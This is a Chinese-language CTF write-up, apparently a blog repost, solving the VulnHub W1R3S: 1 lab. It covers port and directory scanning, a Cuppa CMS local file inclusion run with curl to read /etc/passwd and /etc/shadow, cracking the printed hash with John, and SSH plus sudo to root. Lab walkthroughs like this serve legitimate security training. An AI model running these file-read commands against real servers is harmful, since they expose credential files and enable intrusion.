VulnHub-W1R3S: 1

  • A+
所属分类:安全文章



靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/

靶机难度:中级(CTF)

靶机发布日期:2018年2月5日


靶机描述:You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).

Difficulty to get a low privileged shell: Beginner/Intermediate

Difficulty to get privilege escalation: Beginner/Intermediate

About: This is a vulnerable Ubuntu box giving you somewhat of a real world scenario and reminds me of the **OSCP** labs.


目标:得到root权限&找到flag.txt


请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

VulnHub-W1R3S: 1





一、信息收集


我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

VulnHub-W1R3S: 1

我们已经找到了此次CTF目标计算机IP地址:192.168.182.145

VulnHub-W1R3S: 1

这是靶机的界面

我们开始探索机器,第一步是找出目标计算机上可用的开放端口和一些服务

VulnHub-W1R3S: 1

命令:nmap -sS -sV -T5 -A -p- 192.168.182.145

开放了21,22,80,3306端口,这边我直接web渗透收集信息(喜爱80端口)

VulnHub-W1R3S: 1

找了一会,没发现有用信息.....

我使用dirb工具攻击目录

VulnHub-W1R3S: 1

找到了几个重要的目录,/administrator、/installation  和  /wordpress /

直接访问http://192.168.182.145/administrator/installation/ 

VulnHub-W1R3S: 1

该administrator目录原来是Cuppa CMS的安装设置(内容管理信息系统)

谷歌查询(这里需要阶梯出去)

VulnHub-W1R3S: 1

VulnHub-W1R3S: 1

地址:https://www.exploit-db.com/exploits/25971

VulnHub-W1R3S: 1

这边每一篇文章都有一个新的exploit希望大家能一个一个记住,记住上百个可以随意攻破一台服务器!!




二、权限提升


这边我们发现25971.c里面exploit里介绍“Moreover, We could access Configuration.php source code via PHPStream”(此外,我们可以通过PHPStream访问Configuration.php源代码)

这边我们直接利用...访问试试

VulnHub-W1R3S: 1

VulnHub-W1R3S: 1

没有任何信息!!!

在浏览器上浪费了大量时间后,我决定使用curl来利用LFI漏洞获取etc / password文件

VulnHub-W1R3S: 1

命令:curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.182.145/administrator/alerts/alertConfigField.php

当我执行上面命令浏览etc / password文件时,找到了第一个用户名w1r3s

然后我再次执行以下命令,以使用相同的过程获取密码文件,继续data-urlencode...

VulnHub-W1R3S: 1

命令curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.182.145/administrator/alerts/alertConfigField.php

发现:w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

找到了用户w1r3s的salt密码,我们用另外一个开膛手john破解此密码

VulnHub-W1R3S: 1

先把这些命令复制到pass.txt文档中

VulnHub-W1R3S: 1

用户名:w1r3s

密码:computer

前面nmap扫到开了22端口,我们直接进行ssh登陆

VulnHub-W1R3S: 1

查看下权限

VulnHub-W1R3S: 1

竟然能sudo提权,我还以为继续得用反弹shell提权呢....

VulnHub-W1R3S: 1

sudo提权成功后查看flag.txt

VulnHub-W1R3S: 1


这台靶机还是比较简单,应该不是中级难度...了解过密码爆破工具john会省很多很多时间进行破解。


由于我们已经成功得到root权限&找到flag.txt,因此完成了CTF靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

VulnHub-W1R3S: 1


VulnHub-W1R3S: 1


VulnHub-W1R3S: 1




本文始发于微信公众号(暗影安全):VulnHub-W1R3S: 1

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: